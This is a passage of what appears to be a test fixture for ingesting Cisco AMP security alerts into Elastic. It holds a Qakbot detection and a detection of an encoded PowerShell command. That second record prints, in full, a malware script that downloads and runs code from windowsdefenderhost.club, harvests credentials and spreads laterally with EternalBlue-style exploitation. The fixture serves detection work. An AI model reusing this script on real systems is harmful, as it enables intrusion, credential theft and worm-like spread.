"92673dd0e5f4a094fa6cd57bb301f884f2289f6c", + "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "md5": "2f99e3456dc1d26f77c52b2119fde92f" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_3" + ], + "hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "2f99e3456dc1d26f77c52b2119fde92f", + "92673dd0e5f4a094fa6cd57bb301f884f2289f6c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:54.500187130Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective 
Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336644\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"92673dd0e5f4a094fa6cd57bb301f884f2289f6c\",\"md5\":\"2f99e3456dc1d26f77c52b2119fde92f\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6412622782676337000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.D177E09A9A-95.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6412622782676336644", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T16:14:44.000Z", + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_BP_WMIPRVSE" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": 
"Demo_BP_WMIPRVSE", + "hostname": "Demo_BP_WMIPRVSE" + }, + "event": { + "severity": 2, + "action": "Threat Detection", + "ingested": "2021-09-12T17:31:54.500189198Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880683125978957000,\"timestamp\":1610640884,\"timestamp_nanoseconds\":810000000,\"date\":\"2021-01-14T16:14:44+00:00\",\"event_type\":\"Threat Detection\",\"event_type_id\":553648222,\"detection\":\"WMIPRVSE Launched Encoded Powershell Command\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"bp_data\":{\"audit\":false,\"details\":{\"actions\":[{\"action\":\"end_process\",\"end_ts\":1602033881808,\"params\":[\"10724\"],\"start_ts\":1602033881805,\"status\":\"success\"}],\"eng_epoch\":1,\"eng_ver\":\"0.9.0.104\",\"matched_activity\":{\"events\":[{\"process:start\":{\"app\":\"powershell.exe\",\"app_path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"args\":[\"powershell.exe\",\"-NoP\",\"-NonI\",\"-W\",\"Hidden\",\"-E\",\"$ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) \"],\"cmd_line\":\"powershell.exe -NoP -NonI -W Hidden -E $ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) \",\"parent_app\":\"WmiPrvSE.exe\",\"parent_app_path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"parent_pid\":2236,\"parent_puid\":132461352663910600,\"parent_user\":\"SYSTEM\",\"parent_user_sid\":\"010100000000000512000000\",\"pid\":10724,\"puid\":132465072105597400,\"ts\":1602033881727175700,\"user\":\"user@testdomain.com\",\"user_sid\":\"010100000000000512000000\"}}],\"limited\":false,\"matched\":1},\"schema\":\"endpoint\",\"schema_epoch\":2,\"sig_id\":20190517123456,\"sig_rev\":5},\"detection\":\"apde:20190517123456\",\"end_ts\":1610640884,\"engine\":\"apde\",\"id\":\"d2616Ab846\",\"name\":\"WMIPRVSE Launched Encoded Powershell Command\",\"observables\":{\"file\":[{\"md5\":\"a575a7610e5f003cc36df39e07c4ba7d\",\"name\":\"powershell.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"properties\":{\"copyright\":\"© Microsoft Corporation. All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"88e7cdc0b75364418e11b2c53f772085f1b61d1e\",\"sha256\":\"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218\",\"size\":443392,\"type_id\":1},{\"md5\":\"d683c112190f4b4c6d477d693ee88e35\",\"name\":\"WmiPrvSE.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"properties\":{\"copyright\":\"© Microsoft Corporation. 
